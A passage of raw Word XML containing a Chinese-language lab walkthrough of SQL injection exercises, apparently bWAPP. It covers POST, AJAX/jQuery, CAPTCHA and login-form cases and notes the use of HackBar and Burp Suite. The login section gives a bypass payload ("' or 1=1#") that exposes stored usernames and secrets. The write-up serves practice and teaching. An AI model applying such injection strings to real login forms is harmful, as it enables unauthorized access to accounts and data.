        </w:rPr>
        <w:t>，可以用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB7147">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB7147">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB7147">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hackbar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB7147">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，或者</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DB7147">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DB7147">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抓包，改包。</w:t>
      </w:r>
      <w:r w:rsidR="00A934A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里演示</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A934A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hackbar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A934A1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具注入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A041F47" w14:textId="7CFBE1EF" w:rsidR="00DB7147" w:rsidRPr="00227106" w:rsidRDefault="00DB7147" w:rsidP="00227106">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="661795AB" wp14:editId="07763355">
            <wp:extent cx="5274310" cy="4086860"/>
            <wp:effectExtent l="0" t="0" r="2540" b="889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4086860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C39784" w14:textId="478302F1" w:rsidR="00E7491F" w:rsidRDefault="00E7491F" w:rsidP="00062E5B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>POST/Select</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0814B391" w14:textId="0CD88F29" w:rsidR="00227106" w:rsidRDefault="00DB7147" w:rsidP="00227106">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里演示用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抓包注入，注入过程省略</w:t>
      </w:r>
      <w:r w:rsidR="00EE3983">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6619D37B" w14:textId="5E9E0AFB" w:rsidR="00DB7147" w:rsidRPr="00227106" w:rsidRDefault="00DB7147" w:rsidP="00227106">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70182E4D" wp14:editId="40CDE72C">
            <wp:extent cx="5274310" cy="3065145"/>
            <wp:effectExtent l="0" t="0" r="2540" b="190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3065145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A986950" w14:textId="1D397741" w:rsidR="00E7491F" w:rsidRDefault="00E7491F" w:rsidP="00062E5B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>AJAX/JSON/jQuery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FD2C55" w14:textId="73ECB392" w:rsidR="004E4D08" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常规测试一波，发现不行，待续</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB1CEB1" w14:textId="3B8DBBA5" w:rsidR="00B538CB" w:rsidRDefault="00B538CB" w:rsidP="00EE3983">
      <w:r>
        <w:t>sqli_10-2.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个文件没有进行数据查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579A65B1" w14:textId="1A894A87" w:rsidR="004E4D08" w:rsidRDefault="004E4D08" w:rsidP="00EE3983">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="004E4D08">
        <w:t>http://www.voidcn.com/article/p-kipbdmbt-brb.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F086B3" w14:textId="416C5459" w:rsidR="00B538CB" w:rsidRDefault="004E4D08" w:rsidP="004E4D08">
      <w:r>
        <w:t>//输入框的表单name为title，此处获取并处理创建一个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>key:value</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>键值对赋值给search变量，该键值对形式与GET和POST的data一样，例如title=a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1261CDAE" w14:textId="77777777" w:rsidR="004E4D08" w:rsidRDefault="004E4D08" w:rsidP="004E4D08">
      <w:r>
        <w:t>var search = {title: $("#title").</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>val</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1C3918" w14:textId="77777777" w:rsidR="004E4D08" w:rsidRDefault="004E4D08" w:rsidP="004E4D08">
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getJSON</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>函数请自行百度查阅</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC71FFD" w14:textId="77777777" w:rsidR="004E4D08" w:rsidRDefault="004E4D08" w:rsidP="004E4D08">
      <w:r>
        <w:t>//1、sqli_10-2.php即把数据提交到此文件，也就是说其实ajax查询数据是这个文件在处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482317AF" w14:textId="77777777" w:rsidR="004E4D08" w:rsidRDefault="004E4D08" w:rsidP="004E4D08">
      <w:r>
        <w:t xml:space="preserve">//2、search是存储的键值对，这里提交。正常查询时候是GET方法，那么这里也是GET方法，处理后的GET其实是 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05506833" w14:textId="77777777" w:rsidR="004E4D08" w:rsidRDefault="004E4D08" w:rsidP="004E4D08">
      <w:r>
        <w:t>//3、第三个参数是查询成功后处理要调用的函数，这里是格式化了输出，我们忽略</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BA14E9" w14:textId="77777777" w:rsidR="004E4D08" w:rsidRDefault="004E4D08" w:rsidP="004E4D08">
      <w:r>
        <w:t>$.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getJSON</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("sqli_10-2.php", search, function(data){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C12B2E" w14:textId="77777777" w:rsidR="004E4D08" w:rsidRDefault="004E4D08" w:rsidP="004E4D08">
      <w:r>
        <w:t>//后面的代码是格式化处理查询结果的，我们不用关注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC02BBB" w14:textId="2EA232FE" w:rsidR="00CD15B5" w:rsidRDefault="004E4D08" w:rsidP="004E4D08">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA69A86" w14:textId="73204389" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0482BEE1" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983"/>
    <w:p w14:paraId="26E17A0F" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">        $("#title").</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keyup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(function(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33144D65" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">            // Searches for a movie title</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE9DB28" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">            var search = {title: $("#title").</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>val</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2289619A" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983"/>
    <w:p w14:paraId="0B722325" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">            // AJAX call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BAFFE2" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">            $.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getJSON</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("sqli_10-2.php", search, function(data){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F758D9" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>init_table</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201824D9" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">                // Constructs the table from the JSON data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594A4C28" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                var total = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125884A2" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">                $.each(data, function(key, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>val</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E4F61E" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">                    total++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C2D0BD" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">                    $("#</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>table_yellow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tr:last</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">").after("&lt;tr&gt;&lt;td&gt;" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>val.title</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + "&lt;/td&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>td</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> align='center'&gt;" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>val.release_year</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + "&lt;/td&gt;&lt;td&gt;" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>val.main_character</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + "&lt;/td&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>td</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> align='center'&gt;" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>val.genre</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + "&lt;/td&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>td</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> align='center'&gt;&lt;a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">='http://www.imdb.com/title/" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>val.imdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + "' target='_blank'&gt;Link&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CEB574" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">                });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73141853" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">                // Empty result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F62BA6" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">                if (total == 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F5771D" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE77E62" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">                    $("#</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>table_yellow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tr:last</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">").after("&lt;tr height='30'&gt;&lt;td </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>colspan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>='5' width='580'&gt;No movies were found!&lt;/td&gt;&lt;/tr&gt;");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E85031" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF07C81" w14:textId="54D298AC" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">            })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADEEA83" w14:textId="3E581962" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">        });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D783BA" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">        function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>init_table</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE52BC5" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">            $("#</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>table_yellow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">").html("&lt;tr height='30' </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bgcolor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>='#ffb717' align='center'&gt;" +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CCFD0F" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">                    "&lt;td width='200'&gt;&lt;b&gt;Title&lt;/b&gt;&lt;/td&gt;" +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3714EFC8" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">                    "&lt;td width='80'&gt;&lt;b&gt;Release&lt;/b&gt;&lt;/td&gt;" +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393FA280" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">                    "&lt;td width='140'&gt;&lt;b&gt;Character&lt;/b&gt;&lt;/td&gt;" +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5949CFFB" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">                    "&lt;td width='80'&gt;&lt;b&gt;Genre&lt;/b&gt;&lt;/td&gt;" +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBCB4F5" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">                    "&lt;td width='80'&gt;&lt;b&gt;IMDb&lt;/b&gt;&lt;/td&gt;" +</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057726F9" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">                    "&lt;/tr&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471EDD9F" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">                    );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3E5B78" w14:textId="2E37D0AF" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6E8B3D" w14:textId="0C47ECE7" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00EE3983">
      <w:r>
        <w:t xml:space="preserve">    &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A0A738" w14:textId="028BE220" w:rsidR="00227106" w:rsidRDefault="009F2059" w:rsidP="00227106">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12F27E9F" wp14:editId="1A6B3E6C">
            <wp:extent cx="5274310" cy="1827530"/>
            <wp:effectExtent l="0" t="0" r="2540" b="127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1827530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="658D8DF5" w14:textId="77777777" w:rsidR="00EE3983" w:rsidRPr="00227106" w:rsidRDefault="00EE3983" w:rsidP="00227106"/>
    <w:p w14:paraId="040CEB0C" w14:textId="6E3BE86E" w:rsidR="00E7491F" w:rsidRDefault="00E7491F" w:rsidP="00062E5B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>CAPTCHA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B50C30B" w14:textId="057427FB" w:rsidR="00227106" w:rsidRDefault="00EE3983" w:rsidP="00227106">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说实话我没搞懂这题的意图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542E8DA4" w14:textId="6BE507B4" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00227106">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E90DFA0" wp14:editId="2C7DA9BA">
            <wp:extent cx="5274310" cy="4464050"/>
            <wp:effectExtent l="0" t="0" r="254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4464050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C657B00" w14:textId="05C99AF1" w:rsidR="00EE3983" w:rsidRDefault="00EE3983" w:rsidP="00227106">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示输入验证码，然后跳转到了一个和第一个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DD595B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DD595B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入一模一样的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询页面？？？？</w:t>
      </w:r>
      <w:r w:rsidR="00DD595B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入过程就不多说了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A71078" w14:textId="0BDCE3A1" w:rsidR="00DD595B" w:rsidRPr="00DD595B" w:rsidRDefault="00DD595B" w:rsidP="00227106">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34153E4D" wp14:editId="5911B5FD">
            <wp:extent cx="5274310" cy="3772535"/>
            <wp:effectExtent l="0" t="0" r="254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3772535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA1DBAF" w14:textId="345732DF" w:rsidR="00E7491F" w:rsidRDefault="00E7491F" w:rsidP="00062E5B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Login Form/Hero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A79604" w14:textId="7387FE53" w:rsidR="009F2059" w:rsidRDefault="009F2059" w:rsidP="009F2059">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>常规的登录表单注入，</w:t>
      </w:r>
      <w:r w:rsidR="00DD595B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个参数都试着去测试一下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>万能密码登陆</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A6F627" w14:textId="0B3381E3" w:rsidR="009F2059" w:rsidRDefault="009F2059" w:rsidP="009F2059">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名输入</w:t>
      </w:r>
      <w:r>
        <w:t>' or 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488B0546" w14:textId="520AA460" w:rsidR="009F2059" w:rsidRDefault="009F2059" w:rsidP="009F2059">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码为空</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10475F7E" w14:textId="21136650" w:rsidR="00227106" w:rsidRDefault="009F2059" w:rsidP="009F2059">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接绕过登陆界面</w:t>
      </w:r>
      <w:r w:rsidR="00DD595B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，得到username和secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0048CBE1" w14:textId="6B307194" w:rsidR="00EB3504" w:rsidRPr="009F2059" w:rsidRDefault="00EB3504" w:rsidP="009F2059">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C82276A" wp14:editId="3D352650">
            <wp:extent cx="5274310" cy="4165600"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635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4165600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B990935" w14:textId="1D272D62" w:rsidR="00E7491F" w:rsidRDefault="00E7491F" w:rsidP="00062E5B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Login Form/User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0304BC75" w14:textId="790D3358" w:rsidR="00227106" w:rsidRDefault="00863636" w:rsidP="00227106">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>转载链接：</w:t>
      </w:r>
      <w:r w:rsidR="006213C8" w:rsidRPr="006213C8">
        <w:t>http://www.mamicode.com/info-detail-2239051.html</w:t>
      </w:r>
    </w:p>
